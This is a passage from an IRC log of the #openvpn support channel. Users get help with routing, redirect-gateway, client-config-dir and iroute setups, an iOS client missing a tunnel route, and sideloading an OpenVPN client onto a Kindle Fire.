(which I like since it tells you exactly what's happening, but some people like the "cleaner" looking config files with the meta-directives) 13:27 < _AxS_> ... i wonder if my client-to-client directive is getting in the way... 13:28 < _AxS_> ..nope 13:28 < _AxS_> oh well, i'll play with this later. tnx for being a sounding board 13:38 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 13:45 -!- mnbr [~fr34k@unaffiliated/mnbr] has joined #openvpn 13:46 < mnbr> free vpn 13:47 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:48 -!- mnbr [~fr34k@unaffiliated/mnbr] has quit [Quit: Leaving] 13:56 -!- rkantos [robin@4e.fi] has joined #openvpn 14:02 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 14:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 14:04 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 14:16 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 14:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 14:17 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:17 -!- mode/#openvpn [+v s7r] by ChanServ 14:36 -!- Devastator- [~devas@177.18.196.246] has joined #openvpn 14:37 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 246 seconds] 14:38 < _AxS_> OK so this is odd. iOS client -- topology subnet, i added redirect-gateway just for fun, and everything works. without redirect-gateway it doesn't work. 14:38 < _AxS_> (everything being relative -- i don't have my server set up to NAT the vpn, so i can only access stuffs on the vpn) 14:39 <+pekster> topology subnet has an implicit link-local route for the subnet 14:40 <+pekster> eg: 'ifconfig-push 10.8.0.2 255.255.255.0' adds the 10.8.0.2/24 via 10.8.0.1 (or whatever your server VPN IP is) 14:40 < _AxS_> pekster: ..and the log seems to say that this is being set, but I'm thinking maybe it isn't... 14:41 <+pekster> What can't you do if you don't redirect-gateway? Access the VPN IP of the server? 14:41 <+pekster> You can never access server-side subnets unless you push routes for them 14:41 <+pekster> !serverlan 14:41 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 14:41 < _AxS_> pekster: access anything on the vpn 14:42 <+pekster> What's the routing table on the client after connect in subnet topology? 14:42 < _AxS_> pekster: no idea, haven't found a way to query the routing table of an iphone 14:42 < _AxS_> (not jailbroken, so no access to all the usual linux goodies) 14:43 <+pekster> Lovely. 14:43 <+pekster> (More poking at Apple's walled garden, not the fact that you aren't jailbroken) 14:43 * _AxS_ nods 14:43 <+pekster> Maybe --show-net-up ? 14:43 <+pekster> Oh, I guess that's listed under "Windows-Specific options" :( 14:43 -!- suprsonic [~suprsonic@services.landonsanderson.com] has joined #openvpn 14:44 < _AxS_> i tried using it with verb 6 but it didn't output anything differently from verb 3 (i think verbosity might be ignored or hard set in the ios client right now) 14:44 <+pekster> If you can't ping 10.8.0.1 (VPN server IP) with topology subnet without redirect-gateway, but you can without it, file a bug against openvpn-connect I'd guess. That's not open-source, and neither is your OS, so I doubt people here can help further without access to information we can't ever get 14:45 <+pekster> s/without it/with it/ 14:45 <+pekster> And consisder a more open platform ;) 14:45 < _AxS_> pekster: i can't png 10.8.0.1 from the ping client on the phone, no. However, i *can* ping the client's IP from the server, at least 3/4 of the time. 14:45 < _AxS_> pekster: ..which is odd. 14:46 < _AxS_> Anyhow, this is progress -- at least I've got a way to access the VPN if i need to. I just can't access anything other network resources when connected, which I'm ok with for now 14:48 * pekster likes open platforms since you can poke at them in as much depth as your knowledge/resources allow. I don't necessarily understand all the code, but it's nice to 'grep -nR "error message" *' and see what's actually going on 14:48 <+pekster> It's solved plenty of issues even if nothing was really "broken" just knowing how it worked 14:51 < _AxS_> pekster: given the config i'm using is almost identical to configs on laptop clients, I expect this is a bit of a bug with the (rather new) iOS client. Another tidbit that I mentioned earlier which you might have missed -- when connected to my local network, and my router has a route rule for 10.8.0.0/24 -> [lan-ip-of-server-running-openvpn], everything works. So it's almost as if 10.x.x.x traffic doesn't get bound to the tun iface correctly. 14:53 * pekster shrugs. If you can't even ping across the VPN between the peers (and have checked the firewalls) then it's a much more basic problem that needs solving 14:53 <+pekster> Hard to solve basic problems when you're dealing with opaque black-box programs without access to the source, debugging info, or system routing/interface info 14:54 < _AxS_> yep, very true. 14:55 < neilhwatson> sssh, don't rile the Job's Army. 14:57 <+pekster> Yes, yes, don't look at the walls of our garden as the vines that cover them are so pretty! 14:57 < _AxS_> Anyone know off-hand what the route 'redirect-gateway' adds is? is it the standard 'default via 10.8.0.1' type thing? 14:58 <+pekster> _AxS_: manpage tells you. Either 0/0, or two /1 routes depending on how you call it 14:58 < _AxS_> ah, there's the default. ok tnx 15:00 * _AxS_ is going to try and toss a slightly wider net with a static network route and see if that'll do the trick 15:01 -!- suprsonic [~suprsonic@services.landonsanderson.com] has left #openvpn [] 15:01 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:04 < _AxS_> AHA, progress. "tun_build_route_error: only tunnel routes supported" .. http://sourceforge.net/mailarchive/message.php?msg_id=30371407 seems to match 15:04 <@vpnHelper> Title: SourceForge.net: OpenVPN: (at sourceforge.net) 15:05 <+pekster> Well then, apparently the claim that it's "100% protocol-compatible" is untrue 15:05 <+pekster> Who would have thought a disjoined codebase could ever fail there... :P 15:07 <+pekster> Not really a problem #openvpn can help with. Dunno if #openvpn-as supports their propritiary mobile app or not; you can try there, or their other support mechanisms 15:07 <+pekster> I'd say to check the code, but... ;) 15:08 < _AxS_> pekster: :) 15:09 -!- p47gat [~gatusso3@189.134.210.71] has joined #openvpn 15:10 < p47gat> I can pass the internet with ipv4 forwarding and before it works HELP ! :) 15:10 < p47gat> I can enter to the server but my internet does not work 15:11 <+pekster> p47gat: Some context would help 15:12 <+pekster> !goal 15:12 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 15:12 -!- oomph [~jr@23.30.10.209] has joined #openvpn 15:12 < _AxS_> Sweet. Adding a spurious "route 10.8.0.0 255.255.255.0" to the client config file has made it work as it should. 15:13 < _AxS_> ..so for whatever reason the client isn't doing that on its own, looks like 15:13 < oomph> Hello, does anyone here know of an OpenVPN client, that does not require root access and will run on a Kindle Fire tablet? 15:13 < oomph> There is one on the Android app store, but Kindles app store is kind of useless. 15:14 < _AxS_> Kindle Fire is an Android? 15:14 < oomph> preferably it would be nice to find an APK that I can side load 15:14 < oomph> yes 15:14 < _AxS_> ...i expect that should be doable. if not, you could grab one from the android app store, no? 15:15 < oomph> I don't know how to grab the actual APK file from the app store 15:15 < oomph> aside from installing it directly onto my phone 15:16 < p47gat> pekster, openvpn was working very fine but today it does not work so I just made new users and it works but the problem is that when I connect to the server my pc lost internet 15:16 <@krzee> p47gat, 15:16 <@krzee> !redirect 15:16 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:16 <@vpnHelper> http://ircpimps.org/redirect.png 15:16 <@krzee> see flowchart 15:16 < p47gat> krzee pekster, openvpn was working very fine but today it does not work so I just made new users and it works but the problem is that when I connect to the server my pc lost internet 15:16 < oomph> I would need to download the APK file from the Andoid Market, then side load it onto a kindle fire 15:17 <@krzee> p47gat, that story changes nothing 15:17 < _AxS_> oomph: what version of android is it? i'm guessing it's not 4.0 or higher...... 15:17 <@krzee> troubleshoot it 15:17 <@krzee> lol 15:17 <@krzee> p47gat, what do you mean "new user" ? 15:17 <@krzee> is it access-server or something? 15:17 < p47gat> krzee, new clients 15:17 < oomph> _AxS_: let me check 15:18 <@krzee> as in 1 cert for each client? 15:18 < _AxS_> oomph: finding one that works well for older android versions might be difficult 15:18 < p47gat> krzee, yes 15:18 <@krzee> p47gat, yes, you need each client to have his own cert 15:18 < p47gat> I just made all new, 15:18 < oomph> _AxS_: it runs Ice Cream Sandwich (4.0) 15:18 < oomph> a modified version of it 15:19 < oomph> apparently 15:19 < p47gat> krzee, yes I know, and I alrady and I can enter to the server the problem is that when I'm in the server I lost internet I can not surf and before it never happen 15:19 <@krzee> p47gat, if you want to fix your internet redirecting, use the flowchart i said to use 15:20 < p47gat> crflowchart ? before it work http://crysol.org/es/tunel-openvpn 15:20 <@vpnHelper> Title: Concentrador OpenVPN en Debian GNU/Linux (o Ubuntu) | CRySoL (at crysol.org) 15:20 < _AxS_> oomph: nice, so it's possible then.. 15:20 < p47gat> but not now 15:20 <@krzee> !redi 15:20 <@krzee> !redirect 15:20 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:20 <@vpnHelper> http://ircpimps.org/redirect.png 15:20 <@krzee> ^ THAT flowchart 15:20 <@krzee> like i said 4 minutes ago 15:21 < p47gat> krzee, I think the problem is iptables but I dont know of this topic 15:21 <@krzee> if you dont wanna use the flowchart i made, why would i help you? 15:21 < p47gat> what is flowchart ? 15:21 <@krzee> holey shit 15:22 <@krzee> !redirect 15:22 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:22 <@vpnHelper> http://ircpimps.org/redirect.png 15:22 < _AxS_> p47gat: the flow chart is http://ircpimps.org/redirect.png 15:22 <@krzee> you see the link where it says flowchart? 15:22 <@krzee> you have been given it 4 times 15:22 <@krzee> im done 15:23 <+pekster> oomph: Kindle? 15:23 <+pekster> !kindle 15:23 <@vpnHelper> "kindle" is http://plai.de/android/ - Please report back if you have issues, or if it worked well. (blame plaisthos either way) 15:23 < oomph> yes 15:24 < oomph> pekster: yeah, I am just trying to find an OpenVPN client that I can side load on a Kindle Fire HD 15:24 < oomph> There is one on the actual android market that works well without the need to root your device. 15:25 < oomph> but in order to side load it onto a kindle fire, I need the actual APK files 15:25 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:27 <@krzee> oomph, he gave you the link to the apk, the dev asked that you test it and let him know 15:27 <+pekster> krzee: Is it a full moon or something? :\ 15:27 <@krzee> for srs bro 15:28 < oomph> pekster: does that APK require a jailbroken device? 15:28 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 15:29 <+pekster> rooted? I don't believe so. Try it and find out; I don't know much about it since I'm not the developer nor do I own a Kindle 15:30 -!- _AxS_ [~axs@gentoo/developer/axs] has quit [Quit: gone] 15:30 <@krzee> no root needed 15:33 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has quit [Quit: Orbi] 15:34 -!- dazo is now known as dazo_afk 15:38 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 15:39 < c3vin> what is access server channel 15:39 < c3vin> ? 15:39 <+pekster> !as 15:39 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 15:40 * krzee points at the topic 15:41 <+pekster> (I checked. It's not a full moon, at least not here.) 15:41 <@krzee> its an internet full moon 15:41 <+pekster> Full moon counting by Swatch time? :) 15:41 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:42 -!- Sickness\ is now known as sickness\ 15:44 < oomph> pekster: thanks for the link, I think this should work 15:44 < oomph> will let you all know 15:44 <+pekster> I'm sure the developer is most curious; drop that nickname in your reply so it's sure to be seen 15:46 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 15:46 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:47 -!- sickness\ is now known as Sickness\ 15:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 15:52 < hg_5> hello, how to see pc1 and pc2 puu.sh/1Y1O0 ? 15:53 <+pekster> hg_5: see this: 15:53 <+pekster> !clientlan 15:53 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 15:53 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 15:53 < hg_5> pekster which server you mean black router or white router? 15:53 < hg_5> white router has this route 15:54 < hg_5> but black doesn't , should i manually add this route to black? 15:54 <+pekster> The flowchart explains all the steps you need to expose a client LAN across a VPN connection 15:54 <+pekster> Following it will tell you each step you must take 15:55 < hg_5> pekster can you select which shape on flowchart i have to look ;p? 15:55 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 15:56 <+pekster> huh? You must complete the entire flowchart or your may have missed something 15:56 <+pekster> If you can't follow directions to verify each stage of your VPN is working, then I can't be bothered to provide help 15:57 < hg_5> ok i will check it ..... ;'.. 16:03 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has left #openvpn [] 16:03 < hg_5> pekster 16:03 < hg_5> first shape relates to black router or white router? 16:03 < p47gat> the net.ipv4.ip_forward = 1 but I can have internet connection ! 16:03 -!- p47gat [~gatusso3@189.134.210.71] has quit [Quit: Saliendo] 16:03 -!- p47gat [~gatusso3@189.134.210.71] has joined #openvpn 16:03 -!- p47gat [~gatusso3@189.134.210.71] has quit [Client Quit] 16:04 -!- p47gat [~gatusso3@189.134.210.71] has joined #openvpn 16:04 < p47gat> the is net.ipv4.ip_forward = 1 but I can not have internet ;( help 16:04 <+pekster> hg_5: Both, if those are your VPN clients. The box is pretty obvious. "Can the server ping the vpn ip of the client?" it asks. Can it? 16:04 < hg_5> pekster no it can't 16:05 <+pekster> Then follow that answer and do the next thing on the flowchart 16:05 < hg_5> i have checked through ssh on black router if it can ping, and no it can't it just can ping 10.9.0.x, but not local ip 192.168.7.x 16:05 < p47gat> :( 16:05 < hg_5> fix your client's firewall 16:06 < p47gat> pekster, where can I have flowchart ? 16:06 < hg_5> so its firewall of white router? 16:06 <+pekster> The client. Yes. Stop referring to them as 'white' vs 'black.' You have a VPN client and a VPN server. One acts as a client, the other as a server 16:07 <+pekster> p47gat: The same one you've been linked 4 times now? Maybe you should bookmark it. Or type the command yourself, which is: 16:07 <+pekster> !redirect 16:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:07 <@vpnHelper> http://ircpimps.org/redirect.png 16:07 < hg_5> yes, sorry, pekster so what i should set in client firewall settings(firewall is disabled) 16:08 <+pekster> If your firewall is disabled, you should be able to ping the client VPN IP from the server. I suppose your server's firewall could reject the outbound ping or return reply 16:08 <+pekster> hg_5, if you can't even ping across your VPN tunnel you should not even be worrying about routing your LANs across the VPN. You can't route across a broken link. Fix it. 16:09 < hg_5> pekster how to fix it ;' 16:09 <+pekster> !101 16:09 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 16:09 < oomph> pester, that APK worked with kindle fire 16:09 < oomph> kindle fire HD 16:09 <+pekster> Try a basic netfilter guide hg_5. #netfilter has a link to a decent one in their /topic 16:09 -!- Cpt_Oblivious is now known as Cpt-Oblivious2 16:09 -!- Cpt-Oblivious2 is now known as Cpt-Oblivious3 16:09 -!- Cpt-Oblivious3 is now known as Cpt-Oblivious4 16:10 < hg_5> ok thanks pekster 16:10 -!- Cpt-Oblivious4 is now known as Cpt-Oblivious 16:10 < p47gat> pekster, push "redirect-gateway local def1" is enable in server.conf 16:10 <+pekster> oomph: Good to hear that the Kindle apk worked. (CC: plaisthos to keep you in the loop too) 16:10 < p47gat> pekster, push "redirect-gateway def1 bypass-dhcp" 16:12 <+pekster> Okay, so? If you want Internet-redirection to work, you need to follow the *entire* flowchart, completing each step. Not just enabling a single option 16:12 < oomph> yeah, i sent him a PM 16:12 < oomph> is plaisthos the android dev? 16:14 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:14 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 272 seconds] 16:16 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Read error: Operation timed out] 16:16 < [fred]> how can i set a specific route for one client on the openvpnserver for 'the way back' during connect of that client 16:17 < [fred]> i've a ccd/client.conf with iroute but i always have to set the route to that subnet manually on the openvpnserver after i restarted the server 16:18 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 16:18 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 16:22 -!- Sickness\ is now known as sickness\ 16:23 -!- nickanderson is now known as nickanderson_afk 16:24 <+pekster> [fred]: You need to a matching --route entry in the server's config, otherwise the server won't route to that network 16:24 <+pekster> See the manpage, or: 16:24 <+pekster> !iroute 16:24 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefor belongs in a ccd entry. Also see !route and !ccd 16:24 <+pekster> (well, see the manpage anyway; maybe that info helps in addition) 16:25 < [fred]> hmm 16:26 -!- Devastator- [~devas@177.18.196.246] has quit [Read error: Connection reset by peer] 16:26 <+pekster> [fred]: Maybe this is also useful: 16:26 <+pekster> !clientlan 16:26 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 16:26 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 16:26 -!- Devastator [~devas@177.18.196.246] has joined #openvpn 16:26 -!- sickness\ is now known as Sickness\ 16:27 < [fred]> so theres no way to 'just execute that .sh after client(1) connected' 16:27 <+pekster> You can bring the system route up/down in a --client-connect 16:27 <+pekster> No idea why that's useful 16:28 <+pekster> Even if the client is disconnected, the server is normally still "responsible" for the route, even if the client is down. Just like your gateway is still responsible to route traffic to your PC even if it's off 16:29 < [fred]> my prob is that i've a service on the .1 of a client isolated openvpn but a subnet needs to connect to that internal openvpn-ip there are other clients connected to that server which share the same subnet of that client 16:29 <+pekster> You can't add multiple duplicate routes to a host like that 16:29 < [fred]> i know 16:30 < [fred]> thats why i only want to .sh that script if client(1) connects 16:30 <+pekster> What happens if both clients connect? 16:30 < [fred]> because alle the other client do direct conenct 16:30 <+pekster> You can't have >1 client using the same-numbered LAN. Fix your network topology if you plan to route between them, or explore really hackish full-network NAT solutions 16:31 < [fred]> there only one client why i need to route though a subnet 16:31 < [fred]> i dont want to route between them 16:31 <+pekster> Then don't add a client LAN route, and you don't need the iroute anymore 16:31 <+pekster> Problem solved. 16:31 < [fred]> i want all the client to reach the .1 from the openvpn server 16:31 <+pekster> You don't need an iroute then 16:31 < [fred]> hm 16:32 <+pekster> iroute is for accessing hosts or networks behind the CLIENT side, not the server-side 16:32 < [fred]> yes 16:32 < [fred]> thats why i use it 16:32 < [fred]> that subnet is at a client 16:32 <+pekster> If the client subnet conflicts with another network you have a route fro on the server, you have conflicts 16:33 <+pekster> Re-number your networks, or use crappy work-arounds if you "can't" 16:33 < [fred]> well - i've it running now - everything works - but i need to enter that route every time i restart openvpn 16:33 < [fred]> when the tun0 goes down- the route dissapears 16:33 <+pekster> Then add it as a --route 16:33 <+pekster> And follow the flowchart, as it tells you to do that 16:34 <+pekster> You don't want the route to come and go when the client connects. If you did want that, you would be able to script it and have a very good reason to need that 16:34 < [fred]> but i dont want that the other clients see that route 16:34 <+pekster> Then don't push it 16:34 <+pekster> --route is not the same as --push 16:34 <+pekster> Manpage should help 16:34 < [fred]> well 16:35 < [fred]> i dont push anything 16:35 < [fred]> hmpf 16:35 <+pekster> Then clients don't see it 16:35 <+pekster> SImple 16:35 <+pekster> Clients don't get routes unless they're pushed 16:35 -!- p47gat [~gatusso3@189.134.210.71] has quit [Quit: Saliendo] 16:35 < [fred]> if all the client see the route - some clients are unable to connect, nbecuase they reside in the same subet - but in another place 16:36 < [fred]> so i need to fix that one clients subnet 16:36 <+pekster> Client's don't get the route unless you push it 16:36 < [fred]> and push it 16:36 <+pekster> Stop pushing it 16:36 <+pekster> I don't see your problem 16:36 < [fred]> well 16:36 < [fred]> --push 16:36 < [fred]> and --route 16:36 < [fred]> sound like you're using it via cmdline 16:36 <+pekster> ommit the leading dashes and it's valid in a config file 16:37 <+pekster> As explained in, you guessed it, the manpage I keep referring to 16:37 <+pekster> You can also look every thing I've explained here up in, that's right, the manpage 16:37 < [fred]> well 16:37 <+pekster> If you don't want a client ot get a route, don't push it. It's literally that simple. 16:37 < [fred]> i'm trying to get it to work for 3 days now 16:37 < [fred]> sry - thx for your help 16:37 <+pekster> Post some server and client configs and explain better what's not working 16:37 < [fred]> i think you dont get what i want to do 16:38 <+pekster> Apparently not. You need a server-side route for a client LAN. Did you see the flowchart, becuase that explains *exactly* how to do that 16:38 < [fred]> i'll fix the other subet 16:38 < [fred]> *subnet 16:38 <+pekster> If you don't want that to be pushed to all clients, then don't put a "push 'route blah blah'" statement in the server config 16:38 < [fred]> but strange that openvpn cant do want i want 16:38 < [fred]> well 16:38 < [fred]> i push the openvpn's lan 16:39 <+pekster> You want the route to come up with openvpn, right? This is what the 'route' directive does 16:39 < [fred]> the 'transfer net' 16:39 <+pekster> Post some configs please. I have no clue what a 'transfer net' is 16:40 < [fred]> # First, uncomment out these lines: 16:40 < [fred]> client-config-dir ccd 16:40 < [fred]> route 10.10.99.0 255.255.255.0 16:40 <+pekster> !paste 16:40 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 16:40 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:40 < [fred]> k 16:41 <+pekster> Drop the ccd up somewhere too, either another paste, or a clearly labeled addendum to the server one 16:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 16:42 -!- oomph_ [~jr@173.208.45.163] has joined #openvpn 16:42 -!- oomph_ [~jr@173.208.45.163] has quit [Remote host closed the connection] 16:42 -!- oomph [~jr@23.30.10.209] has quit [Read error: Connection reset by peer] 16:43 < [fred]> http://pastebin.com/HGm3qXSZ 16:43 -!- oomph [~jr@23.30.10.209] has joined #openvpn 16:43 < [fred]> client2-10 have a direct connect to the vpn server 16:43 <+pekster> "This is a private paste. If you created this paste, please login to view it" 16:43 < [fred]> they reach 10.10.99.1 16:43 < [fred]> pff 16:43 < [fred]> se 16:43 < [fred]> cc 16:44 < [fred]> http://pastebin.com/UFdru9Ab 16:44 < [fred]> only client1 has 192.169.0.x 16:44 < [fred]> the router of client1 does the routes/vpn gateway 16:44 -!- oomph_ [~jr@173.208.45.163] has joined #openvpn 16:44 -!- oomph [~jr@23.30.10.209] has quit [Read error: Connection reset by peer] 16:44 < [fred]> sey 16:44 -!- oomph__ [~jr@23.30.10.209] has joined #openvpn 16:44 -!- oomph__ is now known as oomph 16:44 < [fred]> i musspelled 16:44 <+pekster> You're missing a server-side directive to route to the 192.168.0.0/24 netwnork 16:44 <+pekster> As I said earlier. You need that 16:45 < [fred]> yes - but some other client also have 192.168.0 as their homenetwork 16:45 <+pekster> Otherwise the OS itself will not send data bound for that network to the client 16:45 <+pekster> That DOESN'T MATTER 16:45 <+pekster> Your clients don't matter at all 16:45 <+pekster> You're not pushing routes to other clients 16:45 <+pekster> Please go read the section in the manpage titled '--iroute' 16:45 <+pekster> Then read it again 16:45 <+pekster> Then come back and ask if you still don't understand it 16:45 < [fred]> well - if one hosts trys to reach its default gateway (192.168.0.1) it try to connect over the tunnel 16:46 < [fred]> but the default gw is in their homelan 16:46 <+pekster> Nope, Link-local routes are always preferred over VPN routes, unless you're really screwed up the client-side config 16:46 < [fred]> i dont want to push that route to every client 16:46 < [fred]> eh 16:46 < [fred]> sry 16:46 <+pekster> --route does not push that route to all clients 16:46 <+pekster> Please go read the manpage, becuase you clearly don't understand what these directives do 16:46 <+pekster> I can't help if you refuse to read 16:47 < [fred]> i dont want that every client knows about 192.168.0.x - but the openvpnserver need to know the route to 192.168.0.x 16:47 * pekster sighs 16:47 <+pekster> I just told you about half a dozen times how to do that 16:47 -!- oomph_ [~jr@173.208.45.163] has quit [Read error: Connection reset by peer] 16:47 < [fred]> well 16:47 <+pekster> Bury your head in the sand, or use what you've just been told. At this point, I don't really care which you pick 16:47 < [fred]> it doesnt work like you said 16:47 < [fred]> i found that apporach on plenty of webpages 16:48 < [fred]> it doesnt work 16:48 <+pekster> Then post logs at 'verb 4' from your client that gets messed up. It's not getting pushed the 192.168.0.0/24 route unless you've done so in its own ccd file 16:49 < [fred]> without the ccs/client1.conf i always had: MULTI: bad source address from client on the server 16:49 < [fred]> *ccd 16:50 < [fred]> well 16:50 < [fred]> i'll post tommorrow 16:50 < [fred]> its midnight over here 16:50 <+pekster> Stop wasting my screen space with endless 'well'. It's annoying 16:50 < [fred]> and i need to work tomorror 16:50 <+pekster> More typing. Less enter key. 16:50 < [fred]> well 16:50 < [fred]> ok 16:50 -!- mode/#openvpn [+o pekster] by ChanServ 16:50 <@pekster> Please don't do that. 16:51 < [fred]> lol - ok - ill never do that again and i'll post verb 4 tommorrow - but for now i just change that subnet because this would work 16:53 < [fred]> at least it doesnt cost anything ,) 16:53 < [fred]> only time 16:55 -!- Sickness\ is now known as sickness\ 16:55 <@pekster> There's no reason a route on the openvpn server in any way impacts the private LAN behind another client (or one the client is attached to.) Unless perhaps that LAN is directly attached to your VPN server on another interface 16:58 <@pekster> THere's nothing wrong with a setup like this: [client2] - [192.168.0/24 LAN] - [Internet ] - [VPN server] - [Internet] - [192.168.0/24 LAN] - [client1] 16:59 <@pekster> If you want the server (and potentially any clients you choose to push the route to) to reach client1's view of 192.168.0/24, you can selectively control that by pushing it to none, some, or all of your VPN clients 16:59 < [fred]> ok - this now works for me in if-up.d: http://pastebin.com/gNSXf8x7 16:59 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:59 < [fred]> (on the serverside) 17:00 < [fred]> thanks for you time 17:00 <@pekster> You can replace that with the following in your server config: 'route 192.168.0.0 255.255.255.0' 17:00 <@pekster> That'll do the exact same thing 17:00 < [fred]> to this client it does - because its a routed client 17:01 < [fred]> but from the other 10 client there are 4 which are also on 192.168.0.0/24 17:01 < [fred]> but in different locations 17:01 < [fred]> but they need their local lan connectivity 17:01 < [fred]> and they need the connect to 10.10.99.1 17:01 <@pekster> Right, I got all of that 17:02 <@pekster> You're not trying to expose client 1's 192.168.0/24 to the other clients, correct? 17:02 < [fred]> right 17:02 <@pekster> So it's downright silly to do that in a distro post-up iface script instead of doing it from openvpn 17:02 < [fred]> in my setup all the other clients are p2p clients to the openvpn server 17:03 < [fred]> only one lient is routed from a 192.168.0.x subnet 17:03 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 17:04 -!- sickness\ is now known as Sickness\ 17:05 <@pekster> The upshot is that the 'route' option is separate (but related) to the 'push "route ..."' syntax. If something on a client breaks becuase you added 'route 192.168.0.0 255.255.255.0' in the server config and restarted both sides, there's something else wrong (assuming it all worked before you did that and chnaged nothing else.) 17:06 < [fred]> i'll try your hints - thank you very much 17:06 <@pekster> Yup. If you still have issues, feel free to stop back with full server, client, ccd, and client logs at 'verb 4' (server logs may be necessary too, although this sounds like a client-side issue 17:18 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:24 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:25 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving] 17:32 < hg_5> how to add ccd ? 17:37 -!- Sickness\ is now known as sickness\ 17:38 <@pekster> hg_5: See the --client-config-dir directive 17:38 < hg_5> what? 17:39 <@pekster> You enable a ccd dir by using that directive. YOu add a ccd by creating a file matching the client's CN (common-name) in that directory. No extension on the file, just the CN as the full file name 17:45 <@pekster> !ccd 17:45 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 17:49 -!- MarKsaitis 